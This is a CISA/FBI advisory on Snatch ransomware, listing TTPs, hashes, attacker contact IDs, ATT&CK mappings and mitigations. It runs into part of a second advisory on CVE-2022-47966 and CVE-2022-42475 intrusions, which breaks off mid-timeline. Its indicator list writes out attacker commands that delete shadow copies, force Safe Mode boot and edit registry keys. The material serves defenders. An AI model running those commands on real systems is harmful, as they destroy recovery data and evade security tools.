#StopRansomware: Snatch Ransomware | CISA


SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023.

Since mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid.

FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

First appearing in 2018, Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Originally, the group was referred to as Team Truniger, based on the nickname of a key group member, Truniger, who previously operated as a GandCrab affiliate. Snatch threat actors use a customized ransomware variant notable for rebooting devices into Safe Mode [T1562.009], enabling the ransomware to circumvent detection by antivirus or endpoint protection, and then encrypting files when few services are running.

Snatch threat actors have been observed purchasing previously stolen data from other ransomware variants in an attempt to further exploit victims into paying a ransom to avoid having their data released on Snatch’s extortion blog. Note: Since November 2021, an extortion site operating under the name Snatch served as a clearinghouse for data exfiltrated or stolen from victim companies on Clearnet and TOR hosted by a bulletproof hosting service. In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1]

Initial Access and Persistence

Snatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network. Snatch affiliates primarily rely on exploiting weaknesses in Remote Desktop Protocol (RDP) [T1133] for brute-forcing and gaining administrator credentials to victims’ networks [T1110.001]. In some instances, Snatch affiliates have sought out compromised credentials from criminal forums/marketplaces [T1078].

Snatch threat actors gain persistence on a victim’s network by compromising an administrator account [T1078.002] and establishing connections over port 443 [T1071.001] to a command and control (C2) server located on a Russian bulletproof hosting service [T1583.003]. Per IP traffic from event logs provided by recent victims, Snatch threat actors initiated RDP connections from a Russian bulletproof hosting service and through other virtual private network (VPN) services [T1133].

Data Discovery and Lateral Movement

Snatch threat actors were observed using different TTPs to discover data, move laterally, and search for data to exfiltrate. Snatch threat actors use sc.exe to configure, query, stop, start, delete, and add system services using the Windows Command line. In addition to sc.exe, Snatch threat actors also use tools such as Metasploit and Cobalt Strike [S0154].

Prior to deploying the ransomware, Snatch threat actors were observed spending up to three months on a victim’s system. Within this timeframe, Snatch threat actors exploited the victim’s network [T1590], moving laterally across the victim’s network with RDP [T1021.001] for the largest possible deployment of ransomware and searching for files and folders [T1005] for data exfiltration [TA0010] followed by file encryption [T1486].

Defense Evasion and Execution

During the early stages of ransomware deployment, Snatch threat actors attempt to disable antivirus software [T1562.001] and run an executable as a file named safe.exe or some variation thereof. In recent victims, the ransomware executable’s name consisted of a string of hexadecimal characters which match the SHA-256 hash of the file in an effort to defeat rule-based detection [T1036]. Upon initiation, the Snatch ransomware payload queries and modifies registry keys [T1012][T1112], uses various native Windows tools to enumerate the system [T1569.002], finds processes [T1057], and creates benign processes to execute Windows batch (.bat) files [T1059.003]. In some instances, the program attempts to remove all the volume shadow copies from a system [T1490]. After the execution of the batch files, the executable removes the batch files from the victim’s filesystem [T1070.004].

The Snatch ransomware executable appends a series of hexadecimal characters to each file and folder name it encrypts—unique to each infection—and leaves behind a text file titled HOW TO RESTORE YOUR FILES.TXT in each folder. Snatch threat actors communicate with their victims through email and the Tox communication platform based on identifiers left in ransom notes or through their extortion blog. Since November 2021, some victims reported receiving a spoofed call from an unknown female who claimed association with Snatch and directed them to the group’s extortion site. In some instances, Snatch victims had a different ransomware variant deployed on their systems, but received a ransom note from Snatch threat actors. As a result, the victims’ data is posted on the ransomware blog involving the different ransomware variant and on the Snatch threat actors’ extortion blog.

Indicators of Compromise (IOCs)

The Snatch IOCs detailed in this section were obtained through FBI investigations from September 2022 through June 2023.

Email Domains and Addresses

Since 2019, Snatch threat actors have used numerous email addresses to email victims. Email addresses used by Snatch threat actors are random but usually originate from one of the following domains listed in Tables 1 and 2:

Table 1: Malicious Email Domains Observed in Use by Snatch Threat Actors

Email Domains

sezname[.]cz

cock[.]li

airmail[.]cc

Table 2 shows a list of legitimate email domains offering encrypted email services that have been used by Snatch threat actors. These email domains are all publicly available and legal. The use of these email domains by a threat actor should not be attributed to the email domains, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor.

Table 2: Legitimate Email Domains Observed in Use by Snatch Threat Actors

Email Domains

tutanota[.]com / tutamail[.]com / tuta[.]io

mail[.]fr

keemail[.]me

protonmail[.]com / proton[.]me

swisscows[.]email

The email addresses listed in Table 3 were reported by recent victims.

TOX Messaging IDs

TOX Messaging IDs

CAB3D74D1DADE95B52928E4D9DFC003FF5ADB2E082F59377D049A91952E8BB3B419DB2FA9D3F

7229828E766B9058D329B2B4BC0EDDD11612CBCCFA4811532CABC76ACF703074E0D1501F8418

83E6E3CFEC0E4C8E7F7B6E01F6E86CF70AE8D4E75A59126A2C52FE9F568B4072CA78EF2B3C97

0FF26770BFAEAD95194506E6970CC1C395B04159038D785DE316F05CE6DE67324C6038727A58

NOTE: According to ransom notes, this is a “Customer service” TOX to reach out to if the original TOX ID does not respond.

Folder Creation

Folder Creation

C:\$SysReset

Filenames with Associated SHA-256 Hashes

Filenames

SHA-256

qesbdksdvnotrjnexutx.bat

0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f

eqbglqcngblqnl.bat

1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d

safe.exe

5950b4e27554585123d7fca44e83169375c6001201e3bf26e57d079437e70bcd

safe.exe

7018240d67fd11847c7f9737eaaae45794b37a5c27ffd02beaacaf6ae13352b3

safe.exe

28e82f28d0b9eb6a53d22983e21a9505ada925ebb61382fabebd76b8c4acff7c

safe.exe

fc31043b5f079ce88385883668eeebba76a62f77954a960fb03bf46f47dbb066

DefenderControl.exe

a201f7f81277e28c0bdd680427b979aee70e42e8a98c67f11e7c83d02f8fe7ae

PRETTYOCEANApplicationdrs.bi

6992aaad3c47b938309fc1e6f37179eb51f028536f8afc02e4986312e29220c0

Setup.exe

510e9fa38a08d446189c34fe6125295f410b36f00aceb65e7b4508e9d7c4e1d1

WRSA.exe

ed0fd61bf82660a69f5bfe0e66457cfe56d66dd2b310e9e97657c37779aef65d

ghnhfglwaplf.bat

2155a029a024a2ffa4eff9108ac15c7db527ca1c8f89ccfd94cc3a70b77cfc57

nllraq.bat

251427c578eaa814f07037fbe6e388b3bc86ed3800d7887c9d24e7b94176e30d

ygariiwfenmqteiwcr.bat

3295f5029f9c9549a584fa13bc6c25520b4ff9a4b2feb1d9e935cc9e4e0f0924

bsfyqgqeauegwyfvtp.bat

6c9d8c577dddf9cc480f330617e263a6ee4461651b4dec1f7215bda77df911e7

rgibdcghzwpk.bat

84e1476c6b21531de62bbac67e52ab2ac14aa7a30f504ecf33e6b62aa33d1fe5

pxyicmajjlqrtgcnhi.bat

a80c7fe1f88cf24ad4c55910a9f2189f1eedad25d7d0fd53dbfe6bdd68912a84

evhgpp.bat

b998a8c15cc19c8c31c89b30f692a40b14d7a6c09233eb976c07f19a84eccb40

eqbglqcngblqnl.bat

1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d

qesbdksdvnotrjnexutx.bat

0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f

HOW TO RESTORE YOUR FILES.TXT

 

Filenames with Associated SHA-1 Hashes

Filenames

SHA-1

safe.exe

c8a0060290715f266c89a21480fed08133ea2614

Commands Used by Snatch Threat Actors

Commands

wmiadap.exe /F /T /R

%windir%\System32\svchost.eve –k WerSvcGroup

conhost.exe 0xFFFFFFFF -ForceV1

vssadmin delete shadows /all /quiet

bcdedit.exe /set {current} safeboot minimal

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\VSS /VE /T REG_SZ /F /D Service

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mXoRpcSsx /VE /T REG_SZ /F /D Service

REG QUERY HKLM\SYSTEM\CurrentControlSet\Control /v SystemStartOptions

%CONHOST% “1088015358-1778111623-1306428145949291561678876491840500802412316031-33820320

“C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe” –flag-switches-begin –flag-switches-end –no-startup-window /prefetch:5

cmd /d /c cmd /d /c cmd /d /c start ” ” C:\Users\grade1\AppData\Local\PRETTYOCEANluvApplication\PRETTYOCEANApplicationidf.bi.

Registry Keys

Registry Keys

HKLM\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Servers\D8B548F0-E306-4B2B-BD82-25DAC3208786\FriendlyName

HKU\S-1-5-21-4270068108-2931534202-3907561125-1001\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{ED50FC29-B964-
48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF

System Log Changes

Source

Message

TerminalServices-RemoteConnectionManager

Remote session from client name exceeded the maximum allowed failed logon attempts. The session was forcibly terminated.

Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall

A rule was added (Event 2004) or modified (Event 2005) in the Windows Defender Firewall exception list. All rules included action “Allow” and rule name included “File and Printer Sharing”

Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall

A Windows Defender Firewall setting was changed in private, public, and domain profile with type “Enable Windows Defender Firewall” and value of “no”.

Microsoft-Windows-TaskScheduler%4Operational

Instance of process C:\Windows\svchost.exe. (Incorrect file location, should be C:\Windows\System32\svchost.exe)

Mutexes Created

Mutexes Created

\Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key

\Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once

\Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key

gcc-shmem-tdm2-fc_key

gcc-hmem-tdm2-sjlj_once

gcc-shmem-tdm2-use_fc_key

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 4-16 for all referenced threat actor tactics and techniques in this advisory.

Table 4: Snatch Threat Actors ATT&CK Techniques for Enterprise – Reconnaissance

Technique Title

ID

Use

Gather Victim Network Information

T1590

Snatch threat actors may gather information about the victim’s networks that can be used during targeting.

Table 5: Snatch Threat Actors ATT&CK Techniques for Enterprise – Resource Development

Technique Title

ID

Use

Acquire Infrastructure: Virtual Private Server

T1583.003

Snatch threat actors may rent Virtual Private Servers (VPSs) that can be used during targeting. Snatch threat actors acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.

Table 6: Snatch Threat Actors ATT&CK Techniques for Enterprise – Initial Access

Technique Title

ID

Use

Valid Accounts

T1078

Snatch threat actors use compromised user credentials from criminal forums/marketplaces to gain access and maintain persistence on a victim’s network.

External Remote Services

T1133

Snatch threat actors exploit weaknesses in RDP to perform brute forcing and gain administrator credentials for a victim’s network.

Snatch threat actors use VPN services to connect to a victim’s network.

Table 7: Snatch Threat Actors ATT&CK Techniques for Enterprise – Execution

Technique Title

ID

Use

Command and Scripting Interpreter: Windows Command Shell

T1059.003

Snatch threat actors may use batch files (.bat) during ransomware execution and data discovery.

System Services: Service Execution

T1569.002

Snatch threat actors may leverage various Windows tools to enumerate systems on the victim’s network. Snatch ransomware used sc.exe.

Table 8: Snatch Threat Actors ATT&CK Techniques for Enterprise – Persistence

Technique Title

ID

Use

Valid Accounts: Domain Accounts

T1078.002

Snatch threat actors compromise domain accounts to maintain persistence on a victim’s network.

Table 9: Snatch Threat Actors ATT&CK Techniques for Enterprise – Defense Evasion

Technique Title

ID

Use

Masquerading

T1036

Snatch threat actors have the ransomware executable match the SHA-256 hash of a legitimate file to avoid rule-based detection.

Indicator Removal: File Deletion

T1070.004

Snatch threat actors delete batch files from a victim’s filesystem once execution is complete.

Modify Registry

T1112

Snatch threat actors modify Windows Registry keys to aid in persistence and execution.

Impair Defenses: Disable or Modify Tools

T1562.001

Snatch threat actors have attempted to disable a system’s antivirus program to enable persistence and ransomware execution.

Impair Defenses: Safe Mode Boot

T1562.009

Snatch threat actors abuse Windows Safe Mode to circumvent detection by antivirus or endpoint protection and encrypt files when few services are running.

Table 10: Snatch Threat Actors ATT&CK Techniques for Enterprise – Credential Access

Technique Title

ID

Use

Brute Force: Password Guessing

T1110.001

Snatch threat actors use brute force to obtain administrator credentials for a victim’s network.

Table 11: Snatch Threat Actors ATT&CK Techniques for Enterprise – Discovery

Technique Title

ID

Use

Query Registry

T1012

Snatch threat actors may interact with the Windows Registry to gather information about the system, configuration, and installed software.

Process Discovery

T1057

Snatch threat actors search for information about running processes on a system.

Table 12: Snatch Threat Actors ATT&CK Techniques for Enterprise – Lateral Movement

Technique Title

ID

Use

Remote Services: Remote Desktop Protocol

T1021.001

Snatch threat actors may use Valid Accounts to log into a computer using the Remote Desktop Protocol.

Table 13: Snatch Threat Actors ATT&CK Techniques for Enterprise – Collection

Technique Title

ID

Use

Data from Local System

T1005

Snatch threat actors search systems to find files and folders of interest prior to exfiltration.

Table 14: Snatch Threat Actors ATT&CK Techniques for Enterprise – Command and Control

Technique Title

ID

Use

Application Layer Protocols: Web Protocols

T1071.001

Snatch threat actors establish connections over port 443 to blend C2 traffic in with other web traffic.

Table 15: Snatch Threat Actors ATT&CK Techniques for Enterprise – Exfiltration

Technique Title

ID

Use

Exfiltration

TA0010

Snatch threat actors use exfiltration techniques to steal data from a victim’s network.

Table 16: Snatch Threat Actors ATT&CK Techniques for Enterprise – Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

Snatch threat actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

Inhibit System Recovery

T1490

Snatch threat actors delete all volume shadow copies from a victim’s filesystem to inhibit system recovery.

MITIGATIONS

These mitigations apply to all stakeholders. The authoring agencies recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices for hardening software against ransomware attacks (e.g., to prevent threat actors from using Safe Mode to evade detection and file encryption), thus strengthening the secure posture for their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Snatch threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Reduce threat of malicious actors using remote access tools by:
    • Auditing remote access tools on your network to identify currently used and/or authorized software.
    • Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable [CPG 2.T].
    • Using security software to detect instances of remote access software being loaded only in memory.
    • Requiring authorized remote access solutions to be used only from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
    • Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
  • Implement application controls to manage and control execution of software, including allowlisting remote access programs.
    • Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
  • Disable command-line and scripting activities and permissions [CPG 2.N].
  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C].
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E].
  • Reduce the threat of credential compromise via the following:
    • Place domain admin accounts in the protected users’ group to prevent caching of password hashes locally.
    • Refrain from storing plaintext credentials in scripts.
  • Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E].

In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
  • Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R].
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies.
    • Use longer passwords consisting of at least eight characters and no more than 64 characters in length [CPG 2.B].
    • Store passwords in hashed format using industry-recognized password managers.
    • Add password user “salts” to shared login credentials.
    • Avoid reusing passwords [CPG 2.C].
    • Implement multiple failed login attempt account lockouts [CPG 2.G].
    • Disable password “hints.”
    • Refrain from requiring password changes more frequently than once per year.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
    • Require administrator credentials to install software.
  • Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H].
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Disable unused ports and protocols [CPG 2.V].
  • Consider adding an email banner to emails received from outside your organization [CPG 2.M].
  • Disable hyperlinks in received emails.
  • Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 4-16).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at [email protected] or (888) 282-0870.

REFERENCES

[1] DataBreaches.net

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.

VERSION HISTORY

September 20, 2023: Initial version.

Source…

Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475


SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device.

CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

For a downloadable copy of the Malware Analysis Report (MAR) accompanying this CSA, see:

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See Tables 3-13 for the APT actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations.

Overview

By request of the impacted organization, CISA conducted an incident response engagement from February to April 2023. CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization’s network via at least two initial access vectors:

  • Initial Access Vector 1: APT actors exploited CVE-2022-47966 to access the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus.
  • Initial Access Vector 2: APT actors exploited CVE-2022-42475 to access the organization’s firewall device.

CISA and co-sealers identified an array of threat actor activity, to include overlapping TTPs across multiple APT actors. Per the activity conducted, APT actors often scan internet-facing devices for vulnerabilities that can be easily exploited. Firewall, virtual private networks (VPNs), and other edge network infrastructure continue to be of interest to malicious cyber actors. When targeted, they can be leveraged to expand targeted network access, serve as malicious infrastructure, or a mixture of both.

APT Actor Activity

Initial Access Vector 1

As early as January 2023, APT actors exploited CVE-2022-47966 [T1190] for initial access to the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus. CISA observed indications in log files that a connection to the known malicious IP address 192.142.226[.]153 was made as part of initial exploitation.

Through exploitation of CVE-2022-47966, APT actors achieved root level access on the web server and created a local user account [T1136.001] named Azure with administrative privileges [T1068]. Actors were further able to download malware, enumerate the network, collect administrative user credentials, and move laterally through the organization’s network. CISA and co-sealers were unable to determine if proprietary information was accessed, altered, or exfiltrated. This was due to the organization not clearly defining where their data was centrally located and CISA having limited network sensor coverage.

Initial Access Vector 2

Additional APT actors exploited CVE-2022-42475 on the organization’s firewall device, which was indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. It was identified that APT actors compromised and used disabled, legitimate administrative account credentials [T1078.003] from a previously hired contractor—of which the organization confirmed the user had been disabled prior to the observed activity.

Analysis identified that a common behavior for these threat actors was to use disabled administrative account credentials and delete logs from several critical servers in the environment [T1070.001]. This prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers were also unable to further track the activity due to the organization not having Network Address Translation (NAT) IP logging enabled.

APT actors initiated multiple Transport Layer Security (TLS)-encrypted sessions [T1573.002] on Transmission Control Protocol (TCP) port 10443 [T1571], indicating successful exchanges of data transfer from the firewall device. APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses:

  • 144.202.2[.]71
  • 207.246.105[.]240
  • 45.77.121[.]232
  • 47.90.240[.]218

APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded—among other locations, such as the OWA server—into the following directories. Note: The following file paths to these web shells were received in coordination with a trusted third-party; however, the artifacts were not received for analysis.

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\resource.aspx
  • c:\inetpub\wwwroot\uninet\css\font-awesome\css\discover.ashx
  • c:\inetpub\wwwroot\uninet\css\font-awesome\css\configlogin.ashx
  • c:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\template\layouts\approveinfo.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\errorinfo.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.ashx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\error.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\infos.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info-1.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\new_list.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\errorinfo.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\lgnbotr.ashx
  • c:\inetpub\passwordchange\0LECPNJYRH.aspx
  • c:\inetpub\passwordchange\9ehj.aspx
  • c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\servicesinfo.ashx
  • c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\services.aspx
  • c:\inetpub\redirectedSites\[REDACTED]\products\uns1fw.aspx
  • c:\inetpub\redirectedSites\[REDACTED]\products\uns1ew.aspx

The following IP addresses were identified as associated with the loaded web shells:

  • 45.90.123[.]194
  • 154.6.91[.]26
  • 154.6.93[.]22
  • 154.6.93[.]5
  • 154.6.93[.]12
  • 154.6.93[.]32
  • 154.6.93[.]24
  • 184.170.241[.]27
  • 191.96.106[.]40
  • 102.129.145[.]232
Forensic Timeline of APT Actor Activity

Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively. All timestamps are presented in Coordinated Universal Time (UTC).

Table 1: Timeline of APT Actor Activity

Timestamp (UTC)

Event

Description

2023-01-18

11:57:02

Hello World User-Agent string observed in 44 total events.

Uniform Resource Identifier (URI): /cgi-bin/downloadFlile[.]cgi

Hello World, the User-Agent string inside of the initiated HTTP request, was observed during communication between the organization’s web server and malicious command and control (C2) server IP 92.118.39[.]82 [T1071.001]. This string has been observed in open source as an initial step of the Mirai botnet to download malicious artifacts [T1583.005].[1]

2023-01-20

Attempts made to export three files; associated with malicious IP 192.142.226[.]153.

APT actors attempted to export [TA0009], [TA0010] three files, which were analyzed and identified as Local Security Authority Subsystem Service (LSASS) dump files. These files were renamed with .zip and .gif extensions to evade detection [T1036.008]. Analysis confirmed the APT actors were unsuccessful at exfiltrating these files:

  • wo_view_bg.zip (09:06:37 UTC)\
  • wo_view_bg1.gif (09:08:11 UTC)
  • wo_view_bg2.gif (09:19:43 UTC)

Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment. This behavior was identified during the engagement and is detailed throughout Table 1.

2023-01-20

16:51:05

Successful web server exploitation via CVE-2022-47966.

Successful web server (Zoho ManageEngine ServiceDesk Plus) exploitation via CVE-2022-47966.

2023-01-21

06:46:42

Azure local user account with administrative permissions created.

A local user account with administrative permissions, named Azure, was created on the server hosting ServiceDesk Plus.

2023-01-21

06:49:40

LSASS dumped by Azure user.

The Azure user successfully accessed and dumped credentials stored in the process memory of LSASS for the Active Directory (AD) domain [T1003.001].

Note: Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

2023-01-21

06:50:59

Mimikatz.exe downloaded via ConnectWise ScreenConnect.

The legitimate ConnectWise ScreenConnect client was utilized to connect to the ServiceDesk system, download mimikatz.exe, and execute malicious payloads to steal credentials [T1219], [T1588.002].

Note: ConnectWise ScreenConnect was observed in multiple locations within the organization’s environment, but the organization confirmed that it was not authorized software. Analysis assessed APT actors downloaded the legitimate software for malicious, illegitimate use prior to the download of mimikatz.exe.

2023-01-21

07:34:32

Bitmap.exe malware downloaded and designated to connect to C2 IP 179.60.147[.]4.

Azure user account downloaded bitmap.exe to the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server [T1027.009]. This malware is identified as a variant of Metasploit (Meterpreter).

See MAR-10430311-1.v1 for additional details.

2023-01-21

08:46:23

Mimikatz credential dump files created.

Two files (c:\windows\system32\fuu.txt, c:\windows\system32\jojo.txt) were created as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system [T1003].

2023-01-21

09:25:58

Legitimate files/applications nmap.exe and npcap.exe downloaded.

Azure user account downloaded nmap.exe [T1018] and npcap.exe [T1040] to continue network and credential information gathering efforts. Though legitimate applications, APT actors used these files for illegitimate, malicious purposes.

Note: Adversaries may gather information about the victim’s network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

2023-01-21

13:56:14

ssh2.zip downloaded by the Azure user account.

